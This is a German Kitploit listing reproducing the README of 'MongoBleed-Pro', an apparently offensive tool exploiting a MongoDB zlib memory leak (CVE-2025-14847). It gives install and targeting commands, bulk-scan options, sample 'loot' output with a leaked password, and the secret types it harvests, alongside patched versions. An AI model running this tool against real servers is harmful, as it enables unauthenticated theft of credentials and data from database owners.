Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-14847_Expolit — eine kritische Sicherheitslücke zur Offenlegung von Speicherinhalten in der zlib-Komprimierungsverarbeitung von MongoDB. Dieses Tool ermöglicht es Sicherheitsforschern, sensible Daten aus verwundbaren MongoDB-Instanzen zu extrahieren. | Kitploit
Tools/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
SpeicherforensikSchwachstellenanalyseExploitationDatenexfiltrationInformationsbeschaffungPenetrationstestsSecret-ErkennungLernen & BildungDatenbanksicherheit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

eine kritische Sicherheitslücke zur Offenlegung von Speicherinhalten in der zlib-Komprimierungsverarbeitung von MongoDB. Dieses Tool ermöglicht es Sicherheitsforschern, sensible Daten aus verwundbaren MongoDB-Instanzen zu extrahieren.

Repository anzeigen
3333vor 8 MonatenVon Kitploit geprüft

MongoBleed-Pro ☠️

CVE Python License Status

Erweitertes Exploit-Tool für MongoDB-Speicherlecks
Lerne weiter | Hacke weiter mit CyberTechAjju


🔥 Über

MongoBleed-Pro ist ein fortschrittliches Exploit-Tool für CVE-2025-14847, eine kritische Schwachstelle zur Offenlegung von Speicherinhalten in der zlib-Komprimierung von MongoDB. Mit diesem Tool können Sicherheitsforscher vertrauliche Daten aus verwundbaren MongoDB-Instanzen extrahieren.

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie vor Tests immer die entsprechende Genehmigung ein.


💀 Schwachstellendetails


🚀 Funktionen

  • ☠️ Hacker-UI - Elite-Terminaloberfläche mit Animationen
  • ⚡ Multithread-Scanning - Schnelle Speicherextraktion mit konfigurierbaren Threads
  • 🎯 Automatische Schwachstellenerkennung - Automatischer Vuln-Check vor dem Exploit
  • 🔑 Erkennung geheimer Muster - Findet AWS-Keys, API-Tokens, Passwörter, E-Mails
  • 📊 Echtzeit-Fortschritt - Live-Visualisierung des Speicherlecks
  • 💾 Datenexport - Speichert extrahierte Daten zur Analyse in Dateien
  • 🌐 Bulk-Scanning - Mehrere Ziele aus Datei scannen

📦 Installation

root@kitploit:~
# Klone das Repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Installiere die Abhängigkeiten
pip install -r requirements.txt

🎮 Verwendung

Grundlegende Verwendung

root@kitploit:~
python3 mongobleed_pro.py

Bestimmten Host anvisieren

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Benutzerdefinierter Port

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Bulk-Scanning

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Erweiterte Optionen

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

Alle Optionen


📸 Screenshots

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 Erkannte Geheimnis-Typen

  • 🔑 AWS-Zugriffsschlüssel (AKIA...)
  • 🤖 OpenAI-API-Schlüssel (sk-...)
  • 🐙 GitHub-Tokens (ghp_...)
  • 🔐 Passwörter & Geheimnisse
  • 📧 E-Mail-Adressen

📁 Ausgabedateien

DateiBeschreibung
loot_<host>.txtExtrahierte Geheimnisse in lesbarem Format
dump_<host>.binRoher Speicherauszug zur manuellen Analyse

🛡️ Gegenmaßnahmen

Wenn Sie MongoDB-Administrator sind, aktualisieren Sie auf gepatchte Versionen:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Autor

CyberTechAjju

  • 🐦 Twitter: @CyberTechAjju

📜 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE für Details.


⭐ Unterstützung

Wenn dir dieses Tool nützlich war, gib ihm bitte einen ⭐ auf GitHub!


「 Lerne weiter | Hacke weiter 」
Mit ❤️ erstellt von CyberTechAjju

Tool herunterladen
EigenschaftDetails
CVE-IDCVE-2025-14847
SchwachstellentypSpeicheroffenlegung
Betroffene VersionenMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
GrundursachePuffer-Überlesen bei der zlib-Dekomprimierung
AuswirkungNicht authentifizierter Remote-Speicherleck
ArgumentBeschreibungStandard
--targetZiel-IP/-URLInteraktive Eingabeaufforderung
--fileDatei mit ZiellisteKeine
--threadsAnzahl der Threads50
--min-offsetMindest-Speicheroffset20
--max-offsetMaximaler Speicheroffset8192